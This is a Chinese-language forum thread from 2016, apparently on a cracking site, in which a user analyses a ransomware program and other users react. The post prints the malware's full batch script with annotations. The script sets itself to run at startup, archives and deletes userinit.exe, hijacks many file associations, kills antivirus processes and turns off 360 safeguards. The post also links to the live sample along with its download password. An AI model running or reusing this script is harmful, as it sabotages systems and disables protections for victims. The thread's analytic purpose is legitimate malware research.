china-loong 发表于 2016-1-22 11:40

分析一个敲竹杆软件

本帖最后由 china-loong 于 2016-1-22 14:40 编辑

软件打开以后释放文件 修改常用文件打开方式和图标并加密所有办公格式软件(DOC PDF 表格文件)和TXT文档并且用RC6加密方式加密并且每一个加密文件的密码都不同文件有7200秒时间付款购买会给你一个序列号点击复制会出来一行数字 这个数字是根据随机模式加密一共有八种加密方式随机1~8 然后复制一行数字以后再进行某种字节集加密方式加密 得出算法所有密码保存在内存中 当关闭这个软件或者关机计算机内存会得到释放密码自然也没有了释放出的BAT文件(不知道为什么作者要释放出BAT为什么不直接加密成EXE文件以后再运行   )copy %0 "%USERPROFILE%\「开始」菜单\程序\启动\"    复制自身到开机启动
copy %0 "C:\WINDOWS\file.exe"                      复制自身到C盘WINDOWS
c:\rar.exe a -ad -k -s -ibck -p "C:\user.rar" "C:\WINDOWS\system32\userinit.exe" 把文件userinit.exe加密
         del C:\WINDOWS\system32\userinit.exe /s /f /q   把文件userinit.exe删除
reg add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 复制自身到开机启动
reg add"HKEY_CLASSES_ROOT\DLfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f          创建文件注册表
reg add"HKEY_CLASSES_ROOT\DLfile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\DLfile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\nlsfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\nlsfile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\nlsfile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\nlsfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F    修改文件打开方式为自身
reg add"HKEY_CLASSES_ROOT\nlsfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F   修改文件打开方式为自身
reg add"HKEY_CLASSES_ROOT\nlsfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             修改文件图标为“C:\WINDOWS\XM.ico”
reg add"HKEY_CLASSES_ROOT\DLfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F   修改文件打开方式为自身
reg add"HKEY_CLASSES_ROOT\DLfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F    修改文件打开方式为自身
reg add"HKEY_CLASSES_ROOT\DLfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F            修改文件图标为“C:\WINDOWS\XM.ico”
reg add"HKEY_CLASSES_ROOT\BMPfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上
reg add"HKEY_CLASSES_ROOT\datfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上
reg add"HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上
reg add"HKEY_CLASSES_ROOT\OLDfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上
reg add"HKEY_CLASSES_ROOT\TMPfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上
reg add"HKEY_CLASSES_ROOT\PRXfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上
reg add"HKEY_CLASSES_ROOT\inifile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F    修改文件打开方式为自身
reg add"HKEY_CLASSES_ROOT\inifile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F   修改文件打开方式为自身
reg add"HKEY_CLASSES_ROOT\scrfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\scrfile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\scrfile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\scrfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add"HKEY_CLASSES_ROOT\scrfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add"HKEY_CLASSES_ROOT\scrfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F
reg add"HKEY_CLASSES_ROOT\scffile\DefaultIcon" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\scffile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\scffile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add"HKEY_CLASSES_ROOT\scffile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add"HKEY_CLASSES_ROOT\scffile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add"HKEY_CLASSES_ROOT\scffile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F
reg add"HKEY_CLASSES_ROOT\.lnk" /ve /d DLfile /t REG_SZ /F                           修改文件注册表关联为DLfile
reg add"HKEY_CLASSES_ROOT\.reg" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.jpg" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.wav" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.mp4" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.com" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.avi" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.vod" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.rar" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.scf" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.xls" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.txt" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.zip" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.cmd" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.doc" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.dll" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.log" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.pdf" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.vbs" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.zip" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.rar" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.7z" /ve /d DLfile /t REG_SZ /F                              同上
reg add"HKEY_CLASSES_ROOT\.nls" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.scr" /ve /d DLfile /t REG_SZ /F                           同上
reg add"HKEY_CLASSES_ROOT\.scf" /ve /d DLfile /t REG_SZ /F                           同上
taskkill /im Explorer.exe /f       结束桌面进程
ping -n 3 127.0.0.1                等待时间为3秒
explorer.exe                     运行桌面进程(小重启来刷新注册表服务加载项)
taskkill /f /im kavsvc.exe         结束进程
taskkill /f /im KVXP.kxp      结束进程
taskkill /f /im Rav.exe      结束进程
taskkill /f /im Ravmon.exe      结束进程
taskkill /f /im Mcshield.exe      结束进程
taskkill /f /im VsTskMgr.exe      结束进程
taskkill /f /im 360tray.exe      结束进程
reg add"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\ExecAccess\" /ve /d 0 /t REG_SZ /F
reg add"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\MonAccess" /ve /d 0 /t REG_SZ /F
reg add"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\SiteAccess" /ve /d 0 /t REG_SZ /F
reg add"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\UDiskAccess" /ve /d 0 /t REG_SZ /F
del %0      删除自身





火眼分析结果:http://fireeye.ijinshan.com/analyse.html?md5=5e3caa6eb2aa2237ff0a6eadfcba48fa&sha1=f89f6a47db7d04c07bbceac24d787f6bb33037e6&type=1#full样本地址:链接: http://pan.baidu.com/s/1qWVrgoW 密码: b4yg文件Size: 993810 bytesFile Version: 1.0.0.0Modified: 2016年1月21日, 13:15:54MD5: 6CE3A9B0BAD8B6BFE510D689FD4316C5SHA1: 8E419C2603CF2DAF9B837ED7C514D2F0F195822ACRC32: DC397632
大家觉得要如何解决这种敲竹杠?

china-loong 发表于 2016-1-22 14:32

307677814 发表于 2016-1-22 14:21
可能编码导致乱码的,可以转一下编码再用论坛的“代码”来显示,这样是比较直观,图片看得有点晕乎乎的

3Q已经好了      

北海岁月 发表于 2016-9-18 09:38

我们公司有一台电脑也遇到这种问题,所有文档EXCEL全部加密,弹出窗口要求付款。是通过邮件传染的,现在有办法处理吗! 给个Q联系

292219828 发表于 2016-1-22 12:32

看得我头都晕了。

520_ai_in@sina. 发表于 2016-1-22 12:33

把样本发出来看看

hxz8998 发表于 2016-1-22 12:48

我去,这也太变态了把!!

违规昵称107 发表于 2016-1-22 13:02

看不懂A

china-loong 发表于 2016-1-22 13:37

520_ai_in@sina. 发表于 2016-1-22 12:33
把样本发出来看看

排版已经从新整理

china-loong 发表于 2016-1-22 13:41

hxz8998 发表于 2016-1-22 12:48
我去,这也太变态了把!!

哪里变态了?

吴尚飞 发表于 2016-1-22 13:54

看得我头都大了。

棉花 发表于 2016-1-22 14:00

马丹 请解释下敲竹杠是啥意思

hxz8998 发表于 2016-1-22 14:04

china-loong 发表于 2016-1-22 13:41
哪里变态了?

我是说这个软件,这样没办法处理把{:1_908:}
页: [1] 2 3
查看完整版本: 分析一个敲竹杆软件


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn